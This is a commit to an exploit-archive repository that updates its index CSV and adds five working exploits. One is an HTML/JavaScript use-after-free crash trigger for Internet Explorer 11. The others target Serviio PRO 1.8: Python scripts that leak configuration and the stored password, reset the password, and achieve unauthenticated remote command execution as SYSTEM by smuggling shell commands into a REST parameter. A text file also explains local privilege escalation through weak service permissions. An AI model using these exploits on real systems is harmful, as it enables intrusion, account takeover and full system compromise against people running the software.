DB: 2017-05-04

5 new exploits Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution
2017-05-04 05:01:18 +00:00 · 2017-05-04 05:01:18 +00:00 · b473ba51f3
commit b473ba51f3
parent 6515e26356
6 changed files with 590 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5482,6 +5482,7 @@ id,file,description,date,author,platform,type,port
 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
 41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
 41957,platforms/windows/dos/41957.html,"Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8967,6 +8968,7 @@ id,file,description,date,author,platform,type,port
 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -37805,3 +37807,6 @@ id,file,description,date,author,platform,type,port
 41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
 41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
 41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
 41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0
 41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0
 41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0
--- a/platforms/java/webapps/41958.py
+++ b/platforms/java/webapps/41958.py
@ -0,0 +1,141 @@
 #!/usr/bin/env python
 #
 #
 # Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
 #
 #
 # Vendor: Petr Nejedly | Six Lines Ltd
 # Product web page: http://www.serviio.org
 # Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
 #
 # Summary: Serviio is a free media server. It allows you to stream your media
 # files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
 # games console or mobile phone) on your connected home network.
 #
 # Vendor:
 # "Security:
 # MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
 # so that you can be sure your content is only accessed by you. Make sure you keep your password
 # secure."
 #
 # Desc: The version of Serviio installed on the remote Windows/Linux host is affected
 # by an information disclosure vulnerability due to improper access control enforcement
 # of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
 # via a specially crafted request, to gain access to potentially sensitive information.
 #
 # Tested on: Restlet-Framework/2.2
 #            Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
 #            Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
 #            Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2017-5404
 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
 #
 # SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
 #
 #
 # 12.12.2016
 #
 import sys
 import xml.etree.ElementTree as ET
 from urllib2 import Request, urlopen
 if (len(sys.argv) <= 2):
        print '[*] Usage: serviio_id.py <ip address> <port>'
        print '[*] Example: serviio_id.py 10.211.55.3 23423'
        exit(0)
 host = sys.argv[1]
 port = sys.argv[2]
 headers = {'Accept': 'application/xml'}
 request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
 print '\nPrinting ServiioLinks:'
 print '----------------------\n'
 response_body = urlopen(request).read()
 roottree = ET.fromstring(response_body)
 for URLs in roottree.iter('serviioLink'):
     print URLs.text
 print
 headers = {'Accept': 'application/xml'}
 #request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
 request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
 print '\nPrinting directories:'
 print '---------------------\n'
 response_body = urlopen(request).read()
 roottree = ET.fromstring(response_body)
 for URLs in roottree.iter('path'):
     print URLs.text
 print
 headers = {'Accept': 'application/xml'}
 request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
 print '\nPrinting mediabrowser password:'
 print '-------------------------------\n'
 response_body = urlopen(request).read()
 roottree = ET.fromstring(response_body)
 for URLs in roottree.iter('remoteUserPassword'):
     print URLs.text
 print
 '''
 rewt@zslab:~# python serviio_id.py 10.211.55.3 23423         
 Printing ServiioLinks:
 ----------------------
 serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
 serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
 serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource
 Printing directories:
 ---------------------
 /etc/apache2
 /etc/asl
 /etc/cups
 /etc/defaults
 /etc/emond.d
 /etc/mach_init.d
 /etc/mach_init_per_login_session.d
 /etc/mach_init_per_user.d
 /etc/manpaths.d
 /etc/newsyslog.d
 /etc/openldap
 /etc/pam.d
 /etc/paths.d
 /etc/periodic
 /etc/pf.anchors
 /etc/postfix
 /etc/ppp
 /etc/racoon
 /etc/security
 /etc/snmp
 /etc/ssh
 /etc/ssl
 /etc/sudoers.d
 Printing mediabrowser password:
 -------------------------------
 s3cr3to
 rewt@zslab:~#
 '''
--- a/platforms/java/webapps/41960.py
+++ b/platforms/java/webapps/41960.py
@ -0,0 +1,77 @@
 #!/usr/bin/env python
 #
 #
 # Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change
 #
 #
 # Vendor: Petr Nejedly | Six Lines Ltd
 # Product web page: http://www.serviio.org
 # Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
 #
 # Summary: Serviio is a free media server. It allows you to stream your media
 # files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
 # games console or mobile phone) on your connected home network.
 #
 # Desc: The version of Serviio installed on the remote Windows/Linux host is affected
 # by an unauthenticated password modification vulnerability due to improper access
 # control enforcement of the Configuration REST API. A remote attacker can exploit this,
 # via a specially crafted request, to change the login password for the mediabrowser protected
 # page.
 #
 # Tested on: Restlet-Framework/2.2
 #            Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
 #            Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
 #            Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2017-5407
 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php
 #
 # SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
 #
 #
 # 12.12.2016
 #
 import sys
 import xml.etree.ElementTree as ET
 from urllib2 import Request, urlopen
 if (len(sys.argv) <= 3):
        print '[*] Usage: serviio_pwd.py <ipaddress> <port> <newpassword>'
        print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2'
        exit(0)
 host = sys.argv[1]
 port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.
 lozi = sys.argv[3]
 values = """
 <remoteAccess>
    <remoteUserPassword>{0}</remoteUserPassword>
    <preferredRemoteDeliveryQuality>ORIGINAL</preferredRemoteDeliveryQuality>
    <portMappingEnabled>true</portMappingEnabled>
    <externalAddress>myserviio.dyndns.com</externalAddress>
 </remoteAccess>"""
 put = values.format(lozi)
 headers = {
  'Content-Type': 'application/xml',
  'Accept': 'application/xml'
 }
 request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers)
 request.get_method = lambda: 'PUT'
 response_body = urlopen(request).read()
 roottree = ET.fromstring(response_body)
 for errorcode in roottree.iter('errorCode'):
     print "\nReceived error code: "+errorcode.text
 print 'Password successfully changed to: '+lozi
 print 'Go to: http://'+host+':23424/mediabrowser\n'
--- a/platforms/windows/dos/41957.html
+++ b/platforms/windows/dos/41957.html
@ -0,0 +1,145 @@
 <!DOCTYPE html>
 <html>
  <head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:black;
        font-color:red;
   };
  </style>
  <script type='text/javascript'></script> 
  <script type="text/javascript" language="JavaScript">
    /********************************
     *  Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
     *  Google Dork: n/a
     *  Date: 03.05.2017
     *  Exploit Author: Marcin Ressel 
     *  TT: @r_esselm
     *  Vendor Homepage: www.microsoft.com
     *  Software Link: n/a
     *  Version: 11.0.9600.18638
     *  Tested on: Windows 7
     *  CVE : n/a
     *  ****************************
        (151c.10a4): Access violation - code c0000005 (first chance)
        First chance exceptions are reported before any exception handling.
        This exception may be expected and handled.
        eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
        eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0         nv up ei pl nz na po nc
        cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
        MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
        706af750 ff36            push    dword ptr [esi]      ds:002b:1195cfa0=????????
        0:007> !heap -p -a @esi
               address 1195cfa0 found in
               _DPH_HEAP_ROOT @ 9f61000
               in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                        ef4230c:         1195c000             2000
        743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
        76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
        76f4a863 ntdll!RtlpFreeHeap+0x0000005d
        76ef2bd5 ntdll!RtlFreeHeap+0x00000142
        769c14ad kernel32!HeapFree+0x00000014
        707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
        6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
        7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
        702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
        702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
        700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
        700c5484 MSHTML!CFrameSite::Passivate+0x00000024
        6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
        6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
        705517cb MSHTML!CBase::JSBind_Release+0x00000050
        6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
        6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
        6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
        6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
        6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
        6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
        6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
        6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
        6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
        6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
        6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
        709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
        7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
        706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
        7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
        70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
        7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
 * 
 */ 
    var ref = [];
    var doc = null;
    var dom = null;
    var trg = null;
    var trg_parent = null;
    var text_r = null;
    var select_o = null;
    function handle() {
                try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
                try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
                try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
                try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
                try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
                try{text_r.select();}catch(e){}
                try{tree_r.setEnd(ref[0],0);}catch(e){}
                try{select_o.selectAllChildren(doc.body);}catch(e){}
                try{tree_r.surroundContents(ref[0]);}catch(e){}
                try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
                try{tree_r.selectNodeContents(document.body);}catch(e){}
                try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
    }
    function testcase() {
             var  e1f = document.getElementById("e1");
 				     doc = document.getElementById("t1").contentWindow.document; 
             e = e1f.contentWindow.document.createElement("ins"); 
 				     e.cite = 'about:blank';
 				     rf = doc.body.appendChild(e); 
 				     ref.push(rf); 
 				     e = e1f.contentWindow.document.createElement("iframe");
 				     rf = doc.body.appendChild(e); 
 				     ref.push(rf); 
 				     dom = doc.getElementsByTagName("*"); 
 				     trg = dom[3]; 
             trg_parent = doc.body;
             text_r = doc.body.createTextRange(); 
 			       tree_r = doc.createRange(); 
 		 	       tree_r.setStart(trg,0); 
 				     tree_r.setEnd(trg,0);
             select_o = window.getSelection(); 
             var ob = new MutationObserver(handle);
                 ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true }); 
           	try { 
                trg.insertBefore(document.createElement("div"),ref[1]);    
            } catch(e) {}
            doc.adoptNode(trg.attributes[0]);
 		        trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "&Agrave;";
 		        tmp = trg;
  }
  </script>
  <title>IE11  MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
  </body>
 </html>
--- a/platforms/windows/local/41959.txt
+++ b/platforms/windows/local/41959.txt
@ -0,0 +1,66 @@
 Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation
 Vendor: Petr Nejedly | Six Lines Ltd
 Product web page: http://www.serviio.org
 Affected version: 1.8.0.0 PRO
 Summary: Serviio is a free media server. It allows you to stream your media
 files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
 games console or mobile phone) on your connected home network.
 Desc: The application suffers from an unquoted search path issue impacting the service
 'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially
 allow an authorized but non-privileged local user to execute arbitrary code with elevated
 privileges on the system. A successful attempt would require the local user to be able to
 insert their code in the system root path undetected by the OS or other security applications
 where it could potentially be executed during application startup or reboot. If successful, the
 local user’s code would execute with the elevated privileges of the application.
 Serviio also suffers from improper permissions which can be used by a simple authenticated user
 that can change the executable file with a binary of choice. The vulnerability exist due to the
 improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and
 its sub-directories.
 Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2017-5405
 Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php
 SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
 12.12.2016
 ---
 C:\>sc qc Serviio
 [SC] QueryServiceConfig SUCCESS
 SERVICE_NAME: Serviio
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Serviio\bin\ServiioService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Serviio
        DEPENDENCIES       : HTTP
        SERVICE_START_NAME : LocalSystem
 C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
 C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
                                                NT AUTHORITY\SYSTEM:(I)(F)
                                                BUILTIN\Administrators:(I)(F)
 Successfully processed 1 files; Failed processing 0 files
 C:\>
--- a/platforms/windows/webapps/41961.py
+++ b/platforms/windows/webapps/41961.py
@ -0,0 +1,156 @@
 #!/usr/bin/env python
 #
 #
 # Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution
 #
 #
 # Vendor: Petr Nejedly | Six Lines Ltd
 # Product web page: http://www.serviio.org
 # Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
 #
 # Summary: Serviio is a free media server. It allows you to stream your media
 # files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
 # games console or mobile phone) on your connected home network.
 #
 # Desc: The version of Serviio installed on the remote Windows host is affected by
 # an unauthenticated remote code execution vulnerability due to improper access control
 # enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper
 # calls cmd.exe to execute system commands. A remote attacker can exploit this with a
 # simple JSON request, gaining system access with SYSTEM privileges via a specially
 # crafted request and escape sequence.
 #
 # =================================================================================
 # org/serviio/ui/resources/server/ActionsServerResource.java:
 # -----------------------------------------------------------
 #
 #    private ResultRepresentation checkStreamUrl(ActionRepresentation representation) {
 #        this.validateParameters(representation, 2);
 #        try {
 #            MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0));
 #            String url = StringUtils.trim(representation.getParameters().get(1));
 #            LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType);
 #            DeliveryContext context = fileType == MediaFileType.VIDEO ? new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null);
 #            FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context);
 #            return this.responseOk();
 #        }
 #        catch (InvalidMediaFormatException e) {
 #            return this.responseOk(603);
 #        }
 #
 # =================================================================================
 # serviio.jar / external / ProcessExecutor.java:
 # ----------------------------------------------
 #
 #    private Map<String, String> createWindowsRuntimeEnvironmentVariables() {
 #        HashMap<String, String> newEnv = new HashMap<String, String>();
 #        newEnv.putAll(System.getenv());
 #        ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2];
 #        i18n[0] = new ProcessExecutorParameter("cmd");
 #        i18n[1] = new ProcessExecutorParameter("/C");
 #        for (int counter = 0; counter < this.commandArguments.length; ++counter) {
 #            ProcessExecutorParameter argument = this.commandArguments[counter];
 #            String envName = "JENV_" + counter;
 #            i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%");
 #            boolean quotesNeededForWindows = this.quotesNeededForWindows(argument);
 #            if (!quotesNeededForWindows) {
 #                argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue()));
 #            }
 #            newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows));
 #        }
 #        this.commandArguments = i18n;
 #        String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir"));
 #        newEnv.put("HOMEDRIVE", tempPath[0]);
 #        newEnv.put("HOMEPATH", tempPath[1]);
 #        newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables());
 #        if (log.isTraceEnabled()) {
 #            log.trace(String.format("Env variables: %s", newEnv.toString()));
 #        }
 #        return newEnv;
 #    }
 #
 #    private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) {
 #        return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? "\"" : "");
 #    }
 #
 #    protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) {
 #        boolean quotesNeeded = argument.getValue().indexOf(" ") > -1;
 #        return quotesNeeded;
 #    }
 #
 #    private String escapeAmpersandForWindows(String value) {
 #        return value.replaceAll("&", "^&");
 #    }
 #
 # =================================================================================
 #
 # Tested on: Restlet-Framework/2.2
 #            Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
 #            Java/1.8.0_121
 #            Java/1.8.0_111
 #            Java/1.8.0_91
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2017-5408
 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php
 #
 # SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
 #
 #
 # 12.12.2016
 #
 #
 # The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
 # output in it and start a calc.exe child process as nt authority\system.
 #
 from urllib2 import Request, urlopen
 import sys
 if (len(sys.argv) <= 1):
        print '[*] Usage: serviio_rce.py <ip address>'
        exit(0)
 host = sys.argv[1]
 values = """
 <action>
    <name>checkStreamUrl</name>
    <parameter>VIDEO</parameter>
    <parameter>1.2.3.4&#x27;&#x5c;"&#x60;&&#x77;&#x68;&#x6f;&#x61;&#x6d;&#x69;&#x20;>&#x74;&#x65;&#x73;&#x74;&#x69;&#x6e;&#x67;&#x75;&#x73;&#x33;&#x2e;&#x74;&#x78;&#x74;&&&#x63;&#x61;&#x6c;&#x63;&&#x60;&#x27;</parameter>
 </action>"""
 headers = {
  'Content-Type': 'application/xml',
  'Accept': 'application/xml'
 }
 request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)
 response_body = urlopen(request).read()
 print response_body
 '''
 Raw request:
 POST /rest/action HTTP/1.1
 Host: 10.211.55.3:23423
 Content-Length: 93
 Accept: application/json, text/plain, */*
 Origin: http://10.211.55.3:23423
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
 Content-Type: application/json;charset=UTF-8
 Referer: http://10.211.55.3:23423/console/
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.8
 DNT: 1
 Connection: close
 {"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}
 '''